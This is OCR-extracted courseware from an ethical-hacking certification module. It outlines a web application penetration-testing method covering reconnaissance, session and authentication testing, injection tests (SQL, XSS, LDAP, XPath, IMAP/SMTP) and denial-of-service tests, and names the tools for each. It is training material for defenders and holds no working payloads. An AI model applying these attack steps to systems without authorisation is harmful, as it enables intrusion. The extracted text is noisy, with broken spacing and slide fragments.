236 M o d u l e F lo w C E H f a W eb A pp C oncepts * Q Q Q Security Tools W eb A pp T hreats * * S C o u n term easu res ^ M o d u l e F l o w As m en tio n ed previously, w eb applications are m ore vulnerable to attacks. A ttackers use w eb applications as th e sources for spreading attacks by turning th e m into malicious applications once com prom ised. Your w e b application m ay also b ec o m e a victim of such attacks. T herefore, to avoid this situation, you should co n d u ct p e n e tra tio n testing in order to d eterm in e th e vulnerabilities before th ey are exploited by real attackers. W e b A pp Pen Testing W e b A pp C oncepts m Security Tools W e b A pp T hreats lm * f f C o u n te rm e a su re s W e b Application Hacking Tools ^ Hacking M eth o d o lo g y 3 M odule 13 Page 1958

237 W eb applications can be com p ro m ised in m any ways. This section describes how to conduct w eb application pen testing against all possible kinds of attacks. M odule 13 Page 1959

238 Ethical Hacking and Countermeasures W eb A p p lic a tio n P en T e s tin g CEH UrtrfW* itfciul NmIm J J W eb application pen te stin g is used to id e n tify, analyze, and re p o rt v u ln e ra b ilitie s such as in p u t validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. in a given application The best w ay to p e rfo rm p enetra tio n te stin g is to co nd u ct a series o f m e th o d ical and re p e a ta b le te s ts, and to w j ork through all o f the d ifferent application vulnerabilities p Id e n tific a tio n o f Ports s m m! /. http 1 Scan the ports to identify the associated running services and analyze them through autom ated or manual tests to find weaknesses R em ediation of V ulnerabilities To retest the solution against vulnerability to ensure th a t it is completely secure V e rific a tio n o f V u ln e ra b ilitie s To exploit the vulnerability in order to test and fix the issue Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. p ך ] W e b A p p l i c a t i o n P e n T e s t i n g 1 u r W eb application pen testing is d o n e to d etec t various security vulnerabilities and associated risks. As a pen tester, you should test your w eb application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing au th en ticatio n, code execution, etc. The best w ay to carry out a penetration test is to conduct a series of m ethodical and repeatable tests, and to w ork th rough all of th e different application vulnerabilities. W e b application pen testing helps in: Identification of Ports: Scan th e ports to identify th e associated running services and analyze th e m through a u to m a te d or m anual tests to find w eaknesses. 0 Verification of Vulnerabilities: To exploit th e vulnerability in order to test and fix th e issue. R em ed iatio n of Vulnerabilities: To retest th e solution against vulnerability to ensure th a t it is com pletely secure. M odule 13 Page 1960 All Rights Reserved. Reproduction is Strictly Prohibited.

239 W eb A p p l i c a t i o n P e n T e s t i n g (C o n t d) C E H START In fo rm a tio n G athering v C onfiguration M anagem ent Testing 9 A u th e n tic a tio n Testing V Session M anagem ent Testing A u th o riz a tio n Testing * Business Logic Testing * Data V a lid a tio n Testing * D en ia l-o f-s e rvice Testing W eb Services Testing AJAX Testing V Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n P e n T e s t i n g ( C o n t d ) The general steps th a t you n eed to follow to conduct w e b application p en e tra tio n te s t are listed as follows. In a future section, each step is explained in detail. Step 1: Defining objective You should define th e aim of th e penetration test before conducting it. This w ould help you to m ove in right direction to w ard s your aim of penetration test. Step 2: Inform ation gathering You should g ath er as m uch inform ation as possible a b o u t your target system or netw ork. Step 3: C onfiguration m a n a g e m e n t testing M ost w eb application attacks occur b ecause of im proper configuration. T herefore, you should conduct configuration m a n a g e m e n t testing. This also helps you to protect against know n vulnerabilities by installing th e latest updates. Step 4: A u thentication testing session Test th e authentication session to u n d erstan d th e au th en ticatio n m e c h a n ism and to determ in e th e possible exploits in it. M odule 13 Page 1961

240 Step 5: Session m a n a g e m e n t testing Perform session m a n a g e m e n t testing to check your w eb application against various attacks that are based on session ID such as session hijacking, session fixation, etc. Step 6: Denial-of-service testing Send a vast a m o u n t of requests to th e w eb application until th e server gets saturated. Analyze th e behavior of application w h e n th e server is saturated. In this w ay you can test your w eb application against denial-of-service attacks. Step 7: Data validation testing Failing to a d o p t a proper data validation m e th o d is th e c o m m o n security w eak n ess observed in m o st w eb applications. This m ay further lead to m ajor vulnerabilities in w eb applications. Hence, before a hacker finds th o se vulnerabilities and exploits your application, perform data validation testing and protect your w eb application. Step 8: Business logic testing W eb application security flaws m ay be p resent even in business logic. Hence, you should test th e business logic for flaws. Exploiting this business logic, attackers m ay do som ething th a t is not allowed by businesses and it m ay so m etim es lead to great financial loss. Testing business logic for security flaws requires u n con ventional thinking. Step 9: A uthorization testing Analyze how a w eb application is authorizing th e user and th en try to find and exploit th e vulnerabilities p resen t in th e authorization m echanism. Step 10: W e b services testing W eb services use HTTP protocol in conjuction with SML, WSDL, SOAP, and UDDI technologies. T herefore, w eb services have X M L/parser related vulnerabilities in addition to SQL injection, inform ation disclosure, etc. You should conduct w e b services testing to d e term in e th e vulnerabilities of w eb -b ased services. Step 11: AJAX testing Though m o re responsive w eb applications are developed using AJAX, it is likely as vulnerable as a traditional w e b application. Testing for AJAX is challenging because w eb application developers are given full freed o m to design th e w ay of com m unication b e tw e e n client and server. Step 12: D o c u m e n t all th e findings O nce you conduct all th e tests m en tio n ed here, d o c u m e n t all th e findings and th e testing techniques em ployed at each step. Analyze th e d o c u m e n t and explain th e current security posture to th e concerned parties and suggest how th ey can e n h an ce their security. M odule 13 Page 1962

241 I n f o r m a t i o n G a t h e r i n g C E H START V P e rform search engine reconnaissance Id e n tify application e n try points Id e n tify th e w e b applications < Allowed and disallowed directories Issues of web application structure, error pages produced Cookie information, 300 HTTP and 400 status codes, 500 internal server errors Web applications, old versions of filesor artifacts e e e Retrieve and analyze ro b o ts.txt file using to o ls such as GNU W get Use th e advanced "s ite :" search o p e ra to r and then click "Cached" to perform search engine reconnaissance Identify application e n try points using to o ls such as W ebscarab, Burp proxy, OWASP ZAP, TamperlE (for Internet Explorer), o r Tam per Data (for Firefox) To id entify w eb applications: probe fo r URLs, do dictionary-style searching (inte llig e nt guessing) and perform vu ln e ra b ility scanning using to o ls such as Nm ap (Port Scanner) and Nessus Analyze th e O /P fro m HEAD and OPTIONS h ttp requests V Web server software version, scripting environment, and OS in use Im plem ent techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, querying search engines (googling) Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. I n f o r m a t i o n G a t h e r i n g Let's get into detail and discuss each w eb application test step thoroughly. The first step in w eb application pen testing is inform ation gathering. To g ath er all the inform ation a b o u t th e target application, follow th e se steps: Step 1: Analyze th e robots.txt file Robot.txt is a file th a t instructs w eb robots a b o u t th e w ebsite such as directories th a t can be allowed and disallowed to th e user. Hence, analyze th e robot.txt and d eterm in e th e allowed and disallowed directories of a w eb application. You can retrieve and analyze robots.txt file using tools such as GNU W get. Step 2: Perform search engine recon n aissan ce Use th e advanced "site:" search o p erato r and th en click C ached to perform search engine reconnaissance. It gives you inform ation such as issues of w e b application stru ctu re and error pages produced. M odule 13 Page 1963

242 Step 3: Identify application entry points Identify application entry points using tools such as W ebscarab, Burp Proxy, OWASP ZAP, Tam perle (for Internet Explorer), or T a m p e r D ata (for Firefox). Cookie inform ation, 300 HTTP and 400 status codes, and 500 internal server errors m ay give clues a b o u t entry points of th e target w eb application. Step 4: Identify th e w e b applications To identify w eb applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as N m ap (Port Scanner) and Nessus. Check for w eb applications, old versions of files, or artifacts. S o m etim es th e old versions of files m ay give useful inform ation th a t attackers can use to launch attacks on th e w eb application. Step 5: Analyze th e O /P fro m HEAD an d OPTIONS h ttp req u ests Im plem ent techniques such as DNS zone transfers, DNS inverse queries, w eb -b ased DNS searches, querying search engines (Googling). This m ay reveal inform ation such as w e b server softw are version, scripting environm ent, and OS in use. M odule 13 Page 1964

243 I n f o r m a t i o n G a t h e r i n g r g u (C o n t d) ( lllfwtf ltkl«4l NMhM y 8 Analyze e rro r codes by requestin g invalid pages and u tilize a lte rn a te request A n a lysis o f e rro r codes... Software versions, details of databases, bugs, and technological components m eth ods (POST/PUT/Other) in order to collect confidential in fo rm a tio n fro m th e server Examine the source code from the >f accessible pages o f th e applica tion fro n t- end Test fo r recognized file ty p e s /e x te n s io n s / d ire c to rie s Web application environment e Test fo r recognized file types/e xte n sions/d ire cto rie s by requesting com m o n file extensions such as.asp,.htm,.php,.exe, and w a tch fo r any unusual output or error codes >f E xa m ine source o f a v a ila b le pages... Provide dues as to the underlying application environment Perform TCP/ICMP and service fin g e rp rin tin g using tra d itio n a l fin g e rp rin tin g to ols such as Nm ap and Queso, o r th e m ore recent application fingerprinting tool Amap >/ TC P /IC M P a nd service Web application services finge rprin ting and associated ports Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. I n f o r m a t i o n G a t h e r i n g ( C o n t d ) Step 6: Analyze error codes Analyze error codes by requesting invalid pages and utilize alternate req u est m eth o d s (POST/PUT/Other) in o rd er to collect confidential inform ation from th e server. This m ay reveal inform ation such as softw are versions, details of databases, bugs, and technological co m p o n en ts. Step 7: Test for recognized file ty p es/e x te n sio n s/d ire c to rie s Test for recognized file types/extensions/directories by requesting co m m o n file extensions such as.asp,.htm,.php,.exe, and observe th e response. This m ay give you an idea a b o u t th e w eb application environm ent. Step 8: Exam ine source of available pages Examine th e source code from th e accessible pages of th e application front-end. This provides clues a b o u t th e underlying application environm ent. Step 9: TCP/ICMP an d service fingerprinting Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as N m ap and Q ueso, or th e m o re recent application fingerprinting tools A m ap. This gives you inform ation a b o u t w eb application services and associated ports. M odule 13 Page 1965

244 rc o n fig u ration M an ag em en t Testing tertmm c E H IU mji Km Im START 1 Disclosure o f confid ential inform ation Source code o f th e application In fo rm a tio n in th e source code, log files, and default < error codes V Perform in fra structu re configura tion m anagem ent te s tin g מ P e rform a pplication configura tion m anagem ent te s tin g & w Identify the ports associated to SSL/TLS wrapped services using Nmap and Nessus» Perform network scanning and analyze the web server banner e Test the application configuration management using CGI scanners and reviewing the contents of the web server, application server, comments, configuration and logs» Use vulnerability scanners, spidering and mirroring tools, searchengines queries or perform manual inspection to test for file extensions handling t» Review source code, enumerate application pages and functionality & Perform directory and file enumeration, reviewing server and application documentation, etc. to test for infrastructure and application admin interfaces» Review OPTIONS HTTP method using Netcat or Telnet Confidential in fo rm ation about access credentials Test fo r file extensions handling Test fo r HTTP m eth ods and XST...> Credentials o f legitim ate users Source code, in sta llatio n paths, passwords fo r applications, and databases Verify th e presence o f old, backup, and unreferenced files Test fo r in fra stru ctu re and application adm in interfaces Adm in interfaces can be found to gain access to admin functionality Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. C o n f i g u r a t i o n M a n a g e m e n t T e s t i n g f ^ \ O nce you g ath er inform ation a b o u t th e w eb application environm ent, test the configuration m a n a g e m e n t. It is im portant to test th e configuration m a n a g e m e n t because im proper configuration m ay allow u n au th o rized users to break into th e w eb application. S te p l: Perform SSL/TLS testing SSL/TLS testing allows you to identify th e ports associated with SSL/TLS w rap p ed services. You can do this with th e help of tools such as N m ap and Nessus. This helps disclose confidential inform ation. Step 2: Perform infrastructure configuration m a n a g e m e n t testing Perform netw ork scanning and analyze w eb server ban n ers to analyze th e source code of th e application. Step 3: Perform application configuration m a n a g e m e n t testing Test th e configuration m a n a g e m e n t of infrastructure using CGI scanners and reviewing th e co n ten ts of th e w e b server, application server, c o m m en ts, configuration, and logs. This gives you inform ation a b o u t th e source code, log files, an d default erro r codes. M odule 13 Page 1966

245 Step 4: Test for file ex ten sio n s handling Use vulnerability scanners, spidering and mirroring tools, search engines queries, or perform m anual inspection to test for file extensions handling. This m ay reveal confidential inform ation a b o u t access credentials. Step 5: Verify th e p resen ce of old, backup, an d u n re feren ced files Review source code and e n u m e ra te application pages and functionality to verify th e old, backup, and u n referenced files. This m ay reveal th e installation paths and passw ords for applications and databases. Step 6: Test for infrastructure an d application ad m in interfaces Perform directory and file en u m eratio n, review server and application docu m en tatio n, etc. to test for infrastructure and application adm in interfaces. Admin interfaces can be used to gain access to th e adm in functionality. Step 7: Test for HTTP m e th o d s an d XST Review OPTIONS HTTP m e th o d using N etcat or T elnet to test for HTTP m e th o d s and XST. This m ay reveal credentials of legitimate users. M odule 13 Page 1967

246 A u t h e n t i c a t i o n T e s t i n g C E H START Test fo r lo g o u t and b ro w s e r cache m a n a g e m e n t V Test fo r CAPTCHA A uthentication v u ln e ra b ilitie s A uthentication v u ln e ra b ilitie s Try to reset passw ords by guessing, social engineering, o r cracking se cre t questions, if used. Check if "re m e m b e r m y p a s s w o rd " m e ch anism is im plem ented by checking the HTML code o f the login page. Check if it is possible to "re u s e " a session a fte r lo g o u t. A lso check if the a p p lic a tio n a u to m a tic a lly logs o u t a user w hen th a t user has been id le fo r a ce rtain am ount o f tim e, and th a t no se nsitive data rem ains stored in the bro w ser cache. Identify all parameters that are sent in a d d itio n to the d e co ded CAPTCHA value fro m the c lie n t to the server and try to send an o ld d e c o d e d CAPTCHA v a lu e w ith an o ld CAPTCHA ID o f an old session ID Test fo r m u ltip le factors a uthentica tion M u ltip le fa c to rs a u th e n tic a tio n vu ln e ra b ilitie s W Check if users hold a hardw are device o f some kind In a d d itio n to the passw ord. Check if h a rd w a re d e vice c o m m u n ic a te s d ire c tly a n d in d e p e n d e n tly w ith the auth e n tica tio n in fra structu re using an a dditio nal com m unication channel. Test f o r race cond itions Race conditions A tte m p t to fo rc e a race c o n d itio n, make m u ltip le sim ultaneous requests w h ile observing the outcom e fo r unexpected behavior. P erform code review. Copyright by EC-Cauactl. All Rights Reserved. Reproduction is S trictly Prohibited. Hjjjjg A u t h e n t i c a t i o n T e s t i n g You need to perform th e following steps to carry out authentication testing: Step 1: Test for V ulnerable R e m e m b e r p assw o rd an d p w d reset Test for Vulnerable R e m e m b e r passw ord and pw d reset by attem p tin g to reset passw ords by guessing, social engineering, or cracking secret questions, if used. Check if a " re m e m b e r m y passw ord" m echanism is im p lem en ted by checking th e HTML code of th e login page; through this passw ord, authentication w eak n ess can be uncovered. Step 2: Test for logout a n d b ro w se r cache m a n a g e m e n t Check if it is possible to "reuse" a session after logout. Also check if th e application autom atically logs out a user w h en th a t user has been idle for a certain a m o u n t of tim e, and th a t no sensitive data rem ains stored in th e brow ser cache. Step 3: Test for CAPTCHA Identify all p a ram eters th a t are sent in addition to th e d eco d ed CAPTCHA value from th e client to th e server and try to send an old d e c o d e d CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you to determ in e authentication vulnerabilities. M odule 13 Page 1968

247 Step 4: Test for m ultiple factors au th en ticatio n Check if users hold a h ard w are device of so m e kind in addition to th e passw ord. Check if the h ard w are device co m m u n icates directly and independently with th e authentication infrastructure using an additional c o m m u n icatio n channel. Step 5: Test for race conditions A ttem p t to force a race condition and m ake multiple sim ultaneous requests while observing th e o u tc o m e for u n expected behavior. Perform code review to check if th e re is a chance for race conditions. M odule 13 Page 1969

248 Session M a n a g e m e n t Te s tin g C E H START Cookie tam pering results in hijacking the sessions o f legitim ate users Collect sufficient num ber o f cookie samples, analyze th e cookie generation a lgorith m and forg e a valid cookie in order to perform the attack Test fo r cookie a ttrib u te s using in te rceptin g proxies such as W ebscarab, Burp proxy, OWASP ZAP, o r tra ffic Test fo r c o o k ie attrib utes Cookie in form atio n to hijack a valid session in te rceptin g brow se r plug-in's such as "T am perle "(for IE) and "Tam per D a ta"(for Firefox) To te st fo r session fixation, m ake a Test fo r session fix a tio n ^ Attacker could steal the user session (session hijacking) re q u est to th e site to be tested and analyze vuln erabilities using th e W ebscarab to o l Test fo r exposed session variables by inspecting e n cryp tio n & reuse o f session Test f o r e xpo sed session va ria b le s C onfidential in form atio n of session toke n leads to a replay session attack to ke n, proxies & caching, GET & POST, and transport vulnerabilities Examine th e URLs in th e re s tric te d area V to test forcsrf Test forc SR F (Cross S ite R equest F orgery) ^ Compromises end user data and operation o r entire web application Copyright by EC-Cauactl. All Rights Reserved. Reproduction is S trictly Prohibited. p y S j S e s s i o n M a n a g e m e n t T e s t i n g After testing th e configuration m a n a g e m e n t, test how th e application m an ag e s th e session. The following are th e steps to conduct session m a n a g e m e n t pen testing: Step 1: Test for session m a n a g e m e n t sch em a Collect a sufficient n u m b e r of cookie sam ples, analyze th e cookie generation algorithm, and forge a valid cookie in order to perform th e attack. This allows you to test your application against cookie tam pering, which results in hijacking th e sessions of legitim ate users. Step 2: Test for cookie attrib u tes Test for cookie attributes using intercepting proxies such as W ebscarab, Burp Proxy, OWASP ZAP, or traffic intercepting brow ser plugins such as "TamperlE"(for IE) and "T am per Data"(for Firefox). If you are able to retrieve cookie inform ation, th en you can use this inform ation to hijack a valid session. Step 3: Test for session fixation To test for session fixation, m ake a request to th e site to be tested and analyze vulnerabilities using th e W ebs carab tool. This helps you to d eterm in e w h e th e r your application is vulnerable to session hijacking. M odule 13 Page 1970

249 Step 4: Test for ex p o se d session variables Confidential inform ation of session token leads to a replay session attack. T herefore, test for exposed session variables by inspecting encryption and reuse of session token, proxies and caching, GET and POST, and tra n sp o rt vulnerabilities. Step 5: Test for CSRF (Cross Site R equest Forgery) Examine th e URLs in th e restricted area to test for CSRF. A CSRF attack com prom ises en d -u ser data and operation or th e entire w e b application. M odule 13 Page 1971

250 A u t h o r i z a t i o n T e s t i n g C teftmm E H ItkMJl Nm Im START y Can gain access to reserved in fo rm a tio n Test fo r path traversal by perform ing in p u t vecto r enum eration and analyzing th e in p u t validation fu n ctio ns present in the web application e Test fo r bypassing authorization schema by examining the adm in fu n ctio nalitie s, to gain access to the resources assigned to a different role ט Test fo r role/privilege manipulation Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A u t h o r i z a t i o n T e s t i n g vulnerabilities: Follow th e steps here to test th e w eb application against authorization Step 1: Test for path traversal Test for path traversal by perform ing input vector en u m eratio n and analyzing th e input validation functions p resen t in th e w eb application. Path traversal allows attackers to gain access to reserved inform ation. Step 2: Test for bypassing authorization sch em a Test for bypassing authorization sch em a by exam ining th e adm in functionalities, to gain access to th e resources assigned to a different role. If th e attacker succeeds in bypassing th e authorization schem a, he or she can gain illegal access to reserved functions/resources. Step 3: Test for privilege escalation Test for role/privilege m anipulation. If th e attacker has access to resources/functionality, th en he or she can perform a privilege escalation attack. M odule 13 Page 1972

251 D a t a V a l i d a t i o n T e s t i n g C E H U rtifm itfciui Nm Im START Session cookie inform ation Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report and attempt to exploit it. Use tools such asowasp CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy Analyze HTML code, test for Stored XSS, leveragestoredxss,verifyifthefile upload allows setting arbitrary MIME types using tools such asowasp CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp,and XSS Assistant Sensitive inform ation such as session authorization tokens Test fo r sto re d cross-site scripting 9 Perform source code analysis to identify JavaScript coding errors 9 Analyze SWF files using tools such as SWFIntruder, Decompiler Flare, Compiler MTASC, Disassembler -Flasm,Swfmil I, and Debugger Version of Flash Plugi n/player Cookie inform ation Test fo r D O M -based cross-site scripting 9 Perform Standard SQL Injection Testing, Union Query SQL Injection Testing, Blind SQL Injection Testing, and Stored Procedure Injection using tools suchas OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. «Use a trial and error approach by inserting'(',' I', and the other characters in order to check the appl i cati on for errors. Use the tool Softerra LDAP Browser Inform ation on DOM- based cross-site scripting vulnerabilities <... Test fo r cross site fla shin g Sensitive inform ation about users and hosts Database inform ation <... P e rfo rm SQL injection te stin g ^ P e rfo rm LDAP injection te stin g Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. D a t a V a l i d a t i o n T e s t i n g W eb applications m ust em ploy proper data validation m ethods. O therw ise, th e re m ay be a chance for th e attacker to break into th e com m unication b e tw e e n th e client and th e server, and inject malicious data. Hence, th e data validation pen testing m u st be co n d u cte d to ensure th a t th e current data validation m e th o d s or techniques em ployed by th e w eb application offer appropriate security. Follow th e steps here to perform d a ta validation testing: Step 1: Test for reflected cross-site scripting A reflected cross-site scripting attacker crafts a URL to exploit th e reflected XSS vulnerability and sends it to th e client in a sp am mail. If th e victim clicks on th e link considering it as from a trusted server, th e malicious script e m b e d d e d by th e attacker in th e URL gets executed on th e victim's brow ser and sends th e victim's session cookie to th e attacker. Using this session cookie, th e attacker can steal th e sensitive inform ation of th e victim. Hence, to avoid this kind of attack you m u st check your w eb applications against reflected XSS attacks. If you put proper data validation m ech a n ism s or m e th o d s in place, th e n you can d eterm in e easily w h e th e r th e URL ca m e originally from th e server or it is crafted by th e attacker. D etect and analyze input vectors for potential vulnerabilities, analyze th e vulnerability report, and a tte m p t to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, W ebscarab, XSS Assistant, and Burp Proxy. M odule 13 Page 1973

252 Step 2: Test for sto red cross-site scripting Analyze HTML code, test for Stored XSS, leverage Stored XSS, and verify if th e file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, W ebscarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive inform ation such as session authorization tokens. Step 3: Test for D O M -based cross-site scripting DOM XSS attack stands for d o c u m e n t object m odel based cross-site scripting attack, which affects th e client's brow ser script code. In this attack, th e input is taken from th e user and th en so m e malicious action is perform ed with it, which in turn leads to th e execution of injected malicious code. W eb applications can be tested against DOM XSS attacks by perform ing source code analysis to identify JavaScript coding errors. Step 4: Test for cross site flashing Analyze SWF files using tools such as SW FIntruder, D ecom piler - Flare, Compiler - MTASC, D isassem bler - Flasm, Swfmill, and D ebugger Version of th e Flash Plugin/Player. Flawed flash applications m ay contain D O M -based XSS vulnerabilities. The test for cross-site flashing gives inform ation on D O M -based cross-site scripting vulnerabilities. Step 5: Perform SQL injection testing Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored p rocedure injection using tools such as OWASP SQLiX, sqlninja, SqlD um per, sqlbftools, SQL Pow er Injector, etc. SQL injection attacks give d ata b a se inform ation to th e attacker. Step 6: Perform LDAP injection testing Use a trial and error approach by inserting '(', 11', and th e o th er characters in o rd er to check th e application for errors. Use th e tool Softerra LDAP Browser. The LDAP injection m ay reveal sensitive inform ation a b o u t users and hosts. M odule 13 Page 1974

253 D a ta V a lid a tio n T e s tin g (C o n t d) CEH In fo rm a tio n o n SQL in je c tio n vu ln e ra b ility In fo rm a tio n a b o u t XM L s tru c tu re W eb server CGI environm ent variables Access c o n fid e n tia l in form ation D iscover v u ln e ra b ilitie s o f an ORM to o l and te s t w e b a p p lic a tio n s th a t use O RM. Use to o ls such as H ibernate, Nhibernate, and Ruby On Rails Try to insert XML m etacharacters Find if th e w e b se rve r a c tu a lly s u p p o rts SSI d ire c tiv e s using to o ls such as W eb Proxy Burp Suite, OWASP ZAP, W ebscarab, S tring searcher: grep In je c t X P ath co d e and in te rfe re w ith th e q u e ry result Id e n tify v u ln e ra b le p a ra m e te rs. U n d ersta n d th e d a ta flo w and d e p lo y m e n t s tru c tu re o f th e c lie n t, and p e rfo rm IM AP/SMTP com m a n d in je c tio n P e rfo rm IM A P /S M T P in jection testing Access to th e backend m ail server Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. D a t a V a l i d a t i o n T e s t i n g ( C o n t d ) Step 7: P erform ORM injection testing Perform ORM injection testing to discover vulnerabilities of an ORM tool and test w eb applications th a t use ORM. Use tools such as H ibernate, N hibernate, and Ruby On Rails. This test gives inform ation on SQL injection vulnerabilities. Step 8: Perform XML injection testing To perform XML injection testing, try to insert XML m eta characters and observe th e response. A successful XML injection m ay give inform ation a b o u t XML structure. Step 9: Perform SSI injection testing Perform SSI injection testing and find if th e w eb server actually supports SSI directives using tools such as W e b Proxy Burp Suite, Paros, W ebscarab, String searcher: grep. If th e attacker can inject SSI im plem entations, th e n he or she can set or print w eb server CGI en v iro n m en t variables. Step 10: Perform XPath injection testing Inject XPath code and interfere with th e query result. XPath injection allows th e attacker to access confidential inform ation. M odule 13 Page 1975

254 Step 11: Perform IM AP/SM TP injection testing Perform IMAP/SMTP injection testing to identify vulnerable param eters. U nderstand th e data flow and d ep lo y m en t structure of th e client, and perform IM AP/SM TP c o m m a n d injection. Malicious IMAP/SMTP c o m m a n d s allow attackers to access th e backend mail server. M odule 13 Page 1976

255 D a ta V a lid a tio n T e s tin g (C o n t d) CEH > In p u t v a lid a tio n e rro rs P e rfo rm OS... y Local d a ta and com m anding system in fo rm a tio n y In je ct code (a m alicious URL) and perform source code analysis to discover code injection vulnerabilities Perform m anual code analysis and craft m alicious HTTP requests using to te s t fo r OS com mand injection attacks Perform m anual and a u to m a te d code analysis using to o ls such as OllyDbg to detect buffer overflow condition P erform buffer o v e rflo w te s tin g y P e rfo rm incubate d v u ln e ra b ility te s tin g y Stack and heap m em ory ^ in fo rm a tio n, a p p lic a tio n control flo w Server configuration ' and in p u t v a lid a tio n schem es Upload a file th a t explo its a co m p o n e nt in th e local user w o rk s ta tio n, when viewed or dow nloaded by th e user, perform XSS, and SQL injection attack Id e n tify all user co n tro lle d in p u t th a t influences one o r m ore headers in the response, and check w h ether he or she can successfully inject a CR+LF sequence in it Test fo r HTTP...-y C ookies, and HTTP splittin g /sm u g gling re d ire c t in fo rm a tio n Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. D a t a V a l i d a t i o n T e s t i n g ( C o n t d ) י Step 12: P erform code injection testing To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives inform ation a b o u t input validation errors. Step 13: Perform OS c o m m a n d in g Perform m anual code analysis and craft malicious HTTP requests using to test for OS c o m m a n d injection attacks. OS co m m an d in g m ay reveal local data and system inform ation. Step 14: Perform buffer overflow testing Perform m anual and a u to m a te d code analysis using tools such as OllyDbg to d etect buffer overflow condition. This m ay help you to d e term in e stack and heap m e m o ry inform ation and application control flow. Step 15: Perform in cu b ated vulnerability testing Upload a file th a t exploits a c o m p o n e n t in th e local user w orkstation, w h en view ed or d o w n lo ad ed by th e user, perform XSS, and SQL injection attacks. Incubated vulnerabilities m ay give inform ation a b o u t server configuration and input validation sc h e m e s to th e attackers. M odule 13 Page 1977

256 Step 16: Test for HTTP splitting/sm uggling Identify all user-controlled input th at influences o n e or m o re h ead ers in th e response and check w h e th e r he or she can successfully inject a CR+LF seq u en ce in it. A ttackers perform HTTP splitting/sm uggling to get cookies and HTTP redirect inform ation. M odule 13 Page 1978

257 D e n i a l o f S e r v i c e T e s t i n g CEH A p p lic a tio n in fo rm a tio n d Craft a query th a t w ill n o t re tu rn a result and includes several w ildcards. Test m anually or employ a fuzzer to autom ate the process Test fo r locking custom er accounts Login a c c o u n t in fo rm a tio n 6 Test th a t an account does indeed lock a fte r a certain num ber o f failed logins. Find places w h ere th e application discloses th e difference between valid and invalid logins Test fo r b u ffe r overflow s B u ffe r o v e rflo w p o in ts Perform a m anual source code analysis and subm it a range o f inputs w ith varying lengths to the application Test fo r user sp ecifie d o b je c t a llo ca tio n M a x im u m n u m b e r o f > o b je c ts th a t a p p lic a tio n can handle Find where th e num bers s u b m itte d as a nam e /va lu e pair m ight be used by th e application code and a tte m p t to set th e value to an extrem ely large n um eric value, then see if the server continues to respond I Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. D e n i a l o f S e r v i c e T e s t i n g To check your w eb application against DoS attacks, follow th e se steps : S te p l: Test for SQL w ildcard attacks Craft a query th a t will not return a result and includes several wildcards. Test m anually or em ploy a fuzzer to a u to m a te th e process. Step2: Test for locking c u sto m e r accounts Test th a t an account does indeed lock after a certain n u m b e r of failed logins. Find places w h ere th e application discloses th e difference b e tw e e n valid and invalid logins. If your w eb application d o esn 't lock c u sto m er accounts after a certain n u m b e r of failed logins, th en th e re is a possibility for th e attacker to crack c u sto m e r p a ssw o rd s by em ploying brute force attacks, dictionary attacks, etc. Step3: Test for buffer overflow s Perform a m anual source code analysis and subm it a range of inputs with varying lengths to the application to test for buffer overflows. Step4: Test for user specified object allocation Find w h e re th e n u m b ers subm itted as a n am e/v alu e pair m ight be used by th e application code and a tte m p t to set th e value to an extrem ely large num eric value, and th e n see if th e server M odule 13 Page 1979

258 continues to respond. If th e attacker know s th e m a x im u m n u m b e r of objects th a t th e application can handle, he or she can exploit th e application by sending objects beyond m axim um limit. M odule 13 Page 1980

259 - D e n i a l o f S e r v i c e T e s t i n g (C o n t d) CEH Logical e rro rs in an application Enter an extrem ely large num ber in th e in p u t field th a t is used by application as a loop counter Use a script to autom atically submit an extrem ely long value to the server in the request that is being logged W rite user provided, w. Local data to disk disks exhaustion Identify and send a large number o f requests th a t p erform database operations and observe any slowdown or new error messages Test fo r proper release of resources Program m ing flaws Create a script to autom ate the creation o f many new sessions w ith the server and run the request that is suspected o f caching th e data w ithin the session for each one V Test fo r storing to o much data in session Session m anagem ent e rro rs Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. D e n i a l o f S e r v i c e T e s t i n g ( C o n t d ) Step5: Test for user input as a loop co u n te r Test for user input as a loop co u n ter and e n te r an extrem ely large n u m b e r in th e input field th at is used by application as a loop counter. If th e application fails to exhibit its predefined m anner, it m e a n s th at application contains a logical error. Step6: W rite user provided d a ta to disk Use a script to autom atically subm it an extrem ely long value to th e server in th e request th a t is being logged. Step7: Test for p ro p e r release of resources Identify and send a large n u m b e r of requests th a t perform d ata b a se operations and observe any slow dow n or n ew error m essages. Step8: Test for storing to o m uch d a ta in session C reate a script to a u to m a te th e creation of m any n ew sessions with th e server and run th e req u est th a t is suspected of caching th e data within th e session for each one. M odule 13 Page 1981

